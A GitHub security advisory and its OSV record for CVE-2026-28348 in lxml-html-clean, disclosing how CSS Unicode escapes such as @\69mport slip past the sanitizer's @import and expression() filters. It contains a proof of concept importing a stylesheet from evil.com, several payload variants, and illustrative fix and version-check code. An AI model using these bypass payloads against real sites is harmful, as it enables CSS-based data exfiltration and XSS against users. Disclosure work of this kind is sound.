GHSA-HW26-MMPG-FQFG

Vulnerability from github – Published: 2026-03-02 19:19 – Updated: 2026-03-05 22:49
Summary
lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes
Details

Summary

The _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the @import and expression() filters, allowing external CSS loading or XSS in older browsers.

Details

The root cause is located in clean.py (around line 594):

style = style.replace('\\', '')

This transformation turns a payload such as @\69mport into @69mport, which does not match the blacklist keyword @import. However, the CSS parsers in all modern browsers decode \69 as the character 'i' (U+0069), following the escape-handling rules in CSS Syntax Module Level 3, section 4.3.7, and therefore interpret @\69mport as a valid @import rule.

The same root cause also bypasses expression() detection: \65xpression(alert(1)) passes through the filter (exploitable in IE only).
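The mismatch can be reproduced without the library. The snippet below is a minimal sketch that mimics only the backslash-stripping step followed by a plain substring check. The function naive_check is a hypothetical stand-in written for illustration; it is not the library's actual _has_sneaky_javascript() implementation.

```python
def naive_check(style: str) -> bool:
    """Hypothetical stand-in: strip backslashes, then search for keywords."""
    stripped = style.replace('\\', '').lower()
    return '@import' in stripped or 'expression(' in stripped


# A plain @import is caught by the keyword search.
print(naive_check('@import url("x.css")'))       # True

# After stripping, "@\69mport" becomes "@69mport", so the search misses it.
print(naive_check('@\\69mport url("x.css")'))    # False

# "\65xpression(" becomes "65xpression(", which also slips through.
print(naive_check('\\65xpression(alert(1))'))    # False
```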

PoC

from lxml_html_clean import clean_html

# Normal @import is correctly blocked:
# clean_html('<style>@import url("http://evil.com/x.css");</style>')
# Output: <div><style> url("http://evil.com/x.css");</style></div>

# Unicode escape bypass:
result = clean_html('<style>@\\69mport url("http://evil.com/x.css");</style>')
print(result)
# Output: <div><style>@\69mport url("http://evil.com/x.css");</style></div>

If this output is rendered in a browser, the browser loads the external stylesheet. Variants such as @\0069mport (zero-padded), @\69 mport (trailing space), and @\49mport (uppercase I) also work.
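One way to see why all of these variants are equivalent is to decode the escapes the way a CSS tokenizer would before looking for keywords. The following is a rough sketch under that assumption: decode_css_escapes and looks_like_import are hypothetical helper names, the regular expression only approximates the CSS escape rules, and this is not presented as the fix shipped in 0.4.4.

```python
import re

# A CSS hex escape is a backslash, 1-6 hex digits, and optionally one
# whitespace character that terminates the escape. Any other escaped
# character (except a newline) stands for itself.
_CSS_ESCAPE = re.compile(
    r'\\([0-9a-fA-F]{1,6})(?:\r\n|[ \t\n\r\f])?|\\([^\n\r\f0-9a-fA-F])'
)


def decode_css_escapes(style: str) -> str:
    """Approximate the escape decoding done by a CSS tokenizer."""
    def _replace(match: re.Match) -> str:
        hex_digits, literal = match.group(1), match.group(2)
        if hex_digits is None:
            return literal
        code_point = int(hex_digits, 16)
        # Zero, surrogates, and out-of-range values map to U+FFFD.
        if (code_point == 0 or code_point > 0x10FFFF
                or 0xD800 <= code_point <= 0xDFFF):
            return '\ufffd'
        return chr(code_point)

    return _CSS_ESCAPE.sub(_replace, style)


def looks_like_import(style: str) -> bool:
    """Hypothetical check: decode first, then compare case-insensitively."""
    return '@import' in decode_css_escapes(style).lower()


for payload in ('@\\69mport', '@\\0069mport', '@\\69 mport', '@\\49mport'):
    print(payload, looks_like_import(payload))
```

Each of the four payloads decodes to @import (or @Import), so a check that runs after decoding flags all of them, whereas a check that runs after stripping backslashes flags none.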

Impact

External CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via expression().


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "lxml-html-clean"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T19:19:15Z",
    "nvd_published_at": "2026-03-05T20:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe `_has_sneaky_javascript()` method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the `@import` and `expression()` filters, allowing external CSS loading or XSS in older browsers.\n\n### Details\nThe root cause is located in `clean.py` (around line 594):\n```python\nstyle = style.replace(\u0027\\\\\u0027, \u0027\u0027)\n```\nThis transformation changes a payload like `@\\69mport` into `@69mport`. This resulting string does NOT match the blacklist keyword `@import`. However, all modern browsers\u0027 CSS parsers decode `\\69` as the character \u0027i\u0027 (hex 69) according to CSS spec section 4.3.7, interpreting `@\\69mport` as a valid `@import` statement.\n\nSame root cause bypasses `expression()` detection: `\\65xpression(alert(1))` passes through (IE only).\n\n### PoC\n```python\nfrom lxml_html_clean import clean_html\n\n# Normal @import is correctly blocked:\n# clean_html(\u0027\u003cstyle\u003e@import url(\"http://evil.com/x.css\");\u003c/style\u003e\u0027)\n# Output: \u003cdiv\u003e\u003cstyle\u003e url(\"http://evil.com/x.css\");\u003c/style\u003e\u003c/div\u003e\n\n# Unicode escape bypass:\nresult = clean_html(\u0027\u003cstyle\u003e@\\\\69mport url(\"http://evil.com/x.css\");\u003c/style\u003e\u0027)\nprint(result)\n# Output: \u003cdiv\u003e\u003cstyle\u003e@\\69mport url(\"http://evil.com/x.css\");\u003c/style\u003e\u003c/div\u003e\n```\nIf rendered in a browser, the browser loads the external CSS. Variants like `@\\0069mport`, `@\\69 mport` (trailing space), and `@\\49mport` (uppercase I) also work.\n\n### Impact\nExternal CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via `expression()`.",
  "id": "GHSA-hw26-mmpg-fqfg",
  "modified": "2026-03-05T22:49:20Z",
  "published": "2026-03-02T19:19:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-hw26-mmpg-fqfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28348"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/commit/2ef732667ddbc74ea59847bcf24b75809aaeed3b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedora-python/lxml_html_clean"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes"
}
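The affected range in the record above (introduced at 0, fixed in 0.4.4) can be checked against an installed copy. The sketch below is illustrative only: the helper names are hypothetical, the parser handles plain dotted release numbers and nothing else, and it assumes the distribution is registered under the PyPI name lxml-html-clean given in the record.

```python
from importlib import metadata
from typing import Optional, Tuple

# Taken from the "fixed" event in the record above.
FIXED_VERSION = (0, 4, 4)


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse a plain release such as '0.4.3'; suffixes like 'rc1' are not handled."""
    return tuple(int(part) for part in version.split('.')[:3])


def is_affected(version: str) -> bool:
    """True when the version sorts before the first fixed release."""
    return parse_version(version) < FIXED_VERSION


def installed_is_affected(dist_name: str = 'lxml-html-clean') -> Optional[bool]:
    """Return None when the distribution is not installed."""
    try:
        return is_affected(metadata.version(dist_name))
    except metadata.PackageNotFoundError:
        return None


print(is_affected('0.4.3'))  # True
print(is_affected('0.4.4'))  # False
```

For anything beyond simple release numbers, a dedicated version parser is the safer choice than the tuple comparison used here.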

